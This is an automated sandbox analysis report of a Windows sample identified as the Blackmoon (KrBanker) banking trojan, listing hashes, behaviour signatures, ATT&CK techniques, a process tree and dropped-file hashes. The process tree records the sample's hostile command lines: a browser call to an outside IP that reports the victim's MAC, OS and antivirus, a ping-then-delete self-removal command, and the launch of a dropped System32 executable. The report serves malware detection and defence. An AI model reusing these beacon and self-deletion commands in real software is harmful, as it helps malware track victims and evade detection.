Analysis
-
max time kernel
145s -
max time network
148s -
platform
windows11-21h2_x64 -
resource
win11-20250410-en -
resource tags
-
submitted
21/04/2025, 18:30
General
-
Target
JaffaCakes118_ca5b08f9fd5693eb4126738d68d6ac68.exe
-
Size
34KB
-
MD5
ca5b08f9fd5693eb4126738d68d6ac68
-
SHA1
a81e3488ad3cbb3232cfeada9cb8f5fafcd62078
-
SHA256
33a238742a161d7c292f77a097a9992c912bfd547b60963df9312bd827937d46
-
SHA512
09e2b7941651a39fbede3fada199df5a0a12b973ec84aa3c8f0fa97de36194ac893dc8c1579ab64fb5d694f0cd3cf628e3f6109f41318c83c68a21225f66ce17
-
SSDEEP
768:Sxa4PfkczEClQF0QGqwq0E6Na8WFaDrTCMNR8Gx8IPE7BNKSzHctMli:bQftW0QGq/aabWrTsGx3P6Cbtr
Malware Config
Signatures
-
Blackmoon family
-
Blackmoon, KrBanker
Blackmoon also known as KrBanker is banking trojan first discovered in early 2014.
-
Detect Blackmoon payload 1 IoCs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Drops file in System32 directory 2 IoCs
-
Drops file in Windows directory 18 IoCs
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Modifies Internet Explorer settings 1 TTPs 29 IoCs
-
Modifies data under HKEY_USERS 2 IoCs
-
Modifies registry class 2 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs
-
Suspicious use of FindShellTrayWindow 2 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_ca5b08f9fd5693eb4126738d68d6ac68.exe"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_ca5b08f9fd5693eb4126738d68d6ac68.exe"1⤵
- Adds Run key to start application
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Internet Explorer\IEXPLORE.EXE"C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://174.139.72.117/ad/get.asp?mac=B80556F4046B9E504FA06C081445222B&os=Windows 8&avs=unknow&ps=NO.&ver=jack2⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" -- "http://174.139.72.117/ad/get.asp?mac=B80556F4046B9E504FA06C081445222B&os=Windows%208&avs=unknow&ps=NO.&ver=jack"3⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2e4,0x2e8,0x2ec,0x2e0,0x2f4,0x7ffddd91f208,0x7ffddd91f214,0x7ffddd91f2204⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1708,i,11839040888664643191,10986547381113532470,262144 --variations-seed-version --mojo-platform-channel-handle=2424 /prefetch:114⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2360,i,11839040888664643191,10986547381113532470,262144 --variations-seed-version --mojo-platform-channel-handle=2356 /prefetch:24⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2452,i,11839040888664643191,10986547381113532470,262144 --variations-seed-version --mojo-platform-channel-handle=2540 /prefetch:134⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3392,i,11839040888664643191,10986547381113532470,262144 --variations-seed-version --mojo-platform-channel-handle=3452 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3400,i,11839040888664643191,10986547381113532470,262144 --variations-seed-version --mojo-platform-channel-handle=3456 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=3952,i,11839040888664643191,10986547381113532470,262144 --variations-seed-version --mojo-platform-channel-handle=4056 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4076,i,11839040888664643191,10986547381113532470,262144 --variations-seed-version --mojo-platform-channel-handle=4136 /prefetch:94⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --always-read-main-dll --field-trial-handle=4244,i,11839040888664643191,10986547381113532470,262144 --variations-seed-version --mojo-platform-channel-handle=4292 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --always-read-main-dll --field-trial-handle=4252,i,11839040888664643191,10986547381113532470,262144 --variations-seed-version --mojo-platform-channel-handle=4356 /prefetch:94⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4160,i,11839040888664643191,10986547381113532470,262144 --variations-seed-version --mojo-platform-channel-handle=4256 /prefetch:144⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4156,i,11839040888664643191,10986547381113532470,262144 --variations-seed-version --mojo-platform-channel-handle=2500 /prefetch:144⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5452,i,11839040888664643191,10986547381113532470,262144 --variations-seed-version --mojo-platform-channel-handle=5420 /prefetch:144⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5448,i,11839040888664643191,10986547381113532470,262144 --variations-seed-version --mojo-platform-channel-handle=3536 /prefetch:144⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5792,i,11839040888664643191,10986547381113532470,262144 --variations-seed-version --mojo-platform-channel-handle=5824 /prefetch:144⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.ProfileImport --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5836,i,11839040888664643191,10986547381113532470,262144 --variations-seed-version --mojo-platform-channel-handle=5920 /prefetch:144⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\cookie_exporter.execookie_exporter.exe --cookie-json=11005⤵
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5792,i,11839040888664643191,10986547381113532470,262144 --variations-seed-version --mojo-platform-channel-handle=5824 /prefetch:144⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6052,i,11839040888664643191,10986547381113532470,262144 --variations-seed-version --mojo-platform-channel-handle=6248 /prefetch:144⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6272,i,11839040888664643191,10986547381113532470,262144 --variations-seed-version --mojo-platform-channel-handle=5968 /prefetch:144⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6672,i,11839040888664643191,10986547381113532470,262144 --variations-seed-version --mojo-platform-channel-handle=6264 /prefetch:144⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6716,i,11839040888664643191,10986547381113532470,262144 --variations-seed-version --mojo-platform-channel-handle=6276 /prefetch:144⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6736,i,11839040888664643191,10986547381113532470,262144 --variations-seed-version --mojo-platform-channel-handle=6020 /prefetch:144⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6880,i,11839040888664643191,10986547381113532470,262144 --variations-seed-version --mojo-platform-channel-handle=6704 /prefetch:144⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6884,i,11839040888664643191,10986547381113532470,262144 --variations-seed-version --mojo-platform-channel-handle=7040 /prefetch:144⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7052,i,11839040888664643191,10986547381113532470,262144 --variations-seed-version --mojo-platform-channel-handle=7064 /prefetch:144⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --always-read-main-dll --field-trial-handle=4764,i,11839040888664643191,10986547381113532470,262144 --variations-seed-version --mojo-platform-channel-handle=4740 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --always-read-main-dll --field-trial-handle=3680,i,11839040888664643191,10986547381113532470,262144 --variations-seed-version --mojo-platform-channel-handle=3632 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4476,i,11839040888664643191,10986547381113532470,262144 --variations-seed-version --mojo-platform-channel-handle=4524 /prefetch:144⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4508,i,11839040888664643191,10986547381113532470,262144 --variations-seed-version --mojo-platform-channel-handle=4128 /prefetch:144⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4484,i,11839040888664643191,10986547381113532470,262144 --variations-seed-version --mojo-platform-channel-handle=4108 /prefetch:144⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --always-read-main-dll --field-trial-handle=4328,i,11839040888664643191,10986547381113532470,262144 --variations-seed-version --mojo-platform-channel-handle=5216 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3556,i,11839040888664643191,10986547381113532470,262144 --variations-seed-version --mojo-platform-channel-handle=5324 /prefetch:144⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4496,i,11839040888664643191,10986547381113532470,262144 --variations-seed-version --mojo-platform-channel-handle=4532 /prefetch:144⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4420,i,11839040888664643191,10986547381113532470,262144 --variations-seed-version --mojo-platform-channel-handle=4280 /prefetch:144⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3476,i,11839040888664643191,10986547381113532470,262144 --variations-seed-version --mojo-platform-channel-handle=6164 /prefetch:144⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --always-read-main-dll --field-trial-handle=6652,i,11839040888664643191,10986547381113532470,262144 --variations-seed-version --mojo-platform-channel-handle=4692 /prefetch:14⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6460,i,11839040888664643191,10986547381113532470,262144 --variations-seed-version --mojo-platform-channel-handle=4744 /prefetch:144⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=4236,i,11839040888664643191,10986547381113532470,262144 --variations-seed-version --mojo-platform-channel-handle=6416 /prefetch:104⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3672,i,11839040888664643191,10986547381113532470,262144 --variations-seed-version --mojo-platform-channel-handle=5412 /prefetch:144⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3&del "C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_ca5b08f9fd5693eb4126738d68d6ac68.exe"2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 33⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\system32\YouPin.exe1⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵
Network
MITRE ATT&CK Enterprise v16
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
280B
MD52502fffc9101ec3d37edf5e3e15abccc
SHA1f7d4cf6d5f266ec40a33798223d074a678c1315f
SHA256d9d740ef72fcadcb0ffbec9765b88bb1667a58d9e884b47806dbe788f86fdd7b
SHA512d3bf08ef52051fb15f68efaacdd3e73898c1cef2ebc315bd8a83867de80307a756e78284daff8b0c9025bd59664ac0e87e09822609821d33c3f041e793884df3
-
Filesize
280B
MD5a53b3cbb0cc185974876c4556f351bdf
SHA1b5a4ca66aeb47754d96066cfa8eda882deda5216
SHA256214faeabf977636099613878cce8a01ab4012b0cd27cf85f21c85575d2a8374d
SHA512c3efc6c6b49912a6fd5f0d83607a08973df087d9bb31c2166c1cc925deae032ca9b5db50a2f2a5df0527e6d9e2807fb17daa59830bf8e34a210765811d3c9780
-
Filesize
3KB
MD50db76292d2af627a601cc5f2e5d132a4
SHA1a2c6884758806193753c6e20477507dfe8b78442
SHA256f7fbe78e55519c2893cac2fd28c31cad8d235c7c3841463fd8ed240cc7d06091
SHA51214d407f36c8d1c89379adaaebf1e7c6c5098c5b30edcc7536c4063b55d9bf171bcde14af078611d5bd5f7425f4a8d240ed7d974ff444dfb91e27891da0f062a2
-
Filesize
3KB
MD52a96e2999f57086087fd7dfab061f67a
SHA1cfab7eb4a0e0c686ec477c1c1ff541a6f189254f
SHA2569bfd3ebb63388680d38c7a4fa25176692e7e15db47620307b843c6805035101f
SHA5127dabd8dc2ef2a94889ca40149249a95c1f7b0771ee48ac0a38fa0924a5cf2da49caed3e272986849060a5efe2b710a50e3d0c01887604e26ccaa0492f62b516c
-
Filesize
2B
MD599914b932bd37a50b983c5e7c90ae93b
SHA1bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA25644136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA51227c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd
-
Filesize
69KB
MD5164a788f50529fc93a6077e50675c617
SHA1c53f6cd0531fd98d6abbd2a9e5fbb4319b221f48
SHA256b305e470fb9f8b69a8cd53b5a8ffb88538c9f6a9c7c2c194a226e8f6c9b53c17
SHA512ec7d173b55283f3e59a468a0037921dc4e1bf3fab1c693330b9d8e5826273c917b374c4b802f3234bbb5e5e210d55e52351426867e0eb8c9f6fba1a053cb05d4
-
Filesize
9KB
MD53d20584f7f6c8eac79e17cca4207fb79
SHA13c16dcc27ae52431c8cdd92fbaab0341524d3092
SHA2560d40a5153cb66b5bde64906ca3ae750494098f68ad0b4d091256939eea243643
SHA512315d1b4cc2e70c72d7eb7d51e0f304f6e64ac13ae301fd2e46d585243a6c936b2ad35a0964745d291ae9b317c316a29760b9b9782c88cc6a68599db531f87d59
-
Filesize
107KB
MD52b66d93c82a06797cdfd9df96a09e74a
SHA15f7eb526ee8a0c519b5d86c845fea8afd15b0c28
SHA256d4c064db769b3c109da2ed80a53fbab00987c17421a47921e41e213781d67954
SHA51295e45c0aea0e704be5f512dffaae377d4abef78da99b3bca769264d69be20f2570daf2f47905645217e1b2696e42b101f26149219f148b4d6dd97a6c2868b6f5
-
Filesize
1KB
MD52071bf54a8f86efd9b0c401e5445eef5
SHA19fe0a5288553e03120f456990d4d725b32a83f5d
SHA256fe0ff3f94f1e874026c965a1b367dfca74faaf1d312b477b8f52ef94710252df
SHA512d453825fd2464a4c7633f03879523efd89981fb66b8b434024c1ae23dc1ec885d9e6db3ed03db3d24e57ca9153b21c039d6280e0c1ac909fa6b2790b8401c6dc
-
Filesize
111B
MD5285252a2f6327d41eab203dc2f402c67
SHA1acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6
SHA2565dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026
SHA51211ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
14KB
MD595bcf7e36b1fb0476b475f926ab63d2c
SHA1076470e52e397b21e4c2c87500f48f4023d62f29
SHA256a693548fd6edc25a9b522fee084c68d4ac520dde713ac7c4cb585e802909e35f
SHA512e5fc542027d11d6664960d941e6d53ef9d39cbcc396cbd18812148f2c977a97d1aec21db9bafbbe606e07766f53829e14c14b9cf87101b0db13e11feff9ec24c
-
Filesize
13KB
MD57dd179d4970f660195404563936c067c
SHA1577847b1db78e866fe47dcaa0d3d949a500bd6b0
SHA2567ea42000dfdddf655ef362f66ffb3d0449a2f45b4d629af08e7e89291429a580
SHA512ff185bef80b24e443b0af842e19cc31720e80b58d17df34757c56a6a51ea83e067f22f75eae8988395bc98e5affd4158089d181e6ecbf2b464b49d021e645451
-
Filesize
37KB
MD52a83c76bff6efab73b8f3d028af4787d
SHA1fa01433894a3993d437a7a4c27c2e17c1257b831
SHA2560023383d5e4e844b40dc352199f0906f204b22744109100aaf54d3a41a330263
SHA51267f0ae38979de2712393ef430d74afa42747b2464493870ada6715167166d983de6060a643fbdf4772f1792c3af293c89a2dfff33580d8862b722e5b649540f4
-
Filesize
4KB
MD5d8a401a9aa99cf718a1025625a50f2c9
SHA1fff4e5d73648849ff559127394ce5b05f6562cab
SHA256a1293ec5c4069544d56f5abcc7e04911b1c829717790d83dce8510a7a2fc4391
SHA512cb8b25ebc5aea4964c9b7a34c5ccdb4e938ed97a984fd1931d2ce890f6a9c06ceff78e3c997133150843ca003af6b453357867f25a5456e302e044c151569983
-
Filesize
22KB
MD546cbcd98b0383629cfcacbd887a8569e
SHA1f476b4699954bde9652cdb8c7dd85601e316e857
SHA256c3cfc4079d320d3cf4f3fd0d8b778814954f9ca4893bcd068b365858117b25d5
SHA5124b78fdcf64477200c96c5c8cdc7c79907e8394a2332bf808365467c5887c9493fd8ea547e7f5326b569cf375a9d9fd2d103f8aeb9dc70a4da32ff1895474dd25
-
Filesize
880B
MD5fa5d487f69000d38afbe565a977542b4
SHA14c9f1e71892057eb0c2efb6c6fb8a29dc95fad4a
SHA2561b50b4f945ef088e16c88c43673261a381780b2c1ddfb0120ad3ecc2c401d277
SHA5124d107bf99a51935e6b29ede4fc618e5a406cc67690fade9a2efb16c0b1d4b68809ec0b55ea5b298a110a035615cae2b00993b4754cf06cf49506dac9c940e1fe
-
Filesize
23KB
MD5eb8cc52c2672b3baaf5a803bce625ec0
SHA16c5db9873bfa28ff8eb3b2b86921b3ec557ee839
SHA256ce8d4ac1db5b5e9b80409ebe7ca58db83f813c41aec819514aa37040a1259d4e
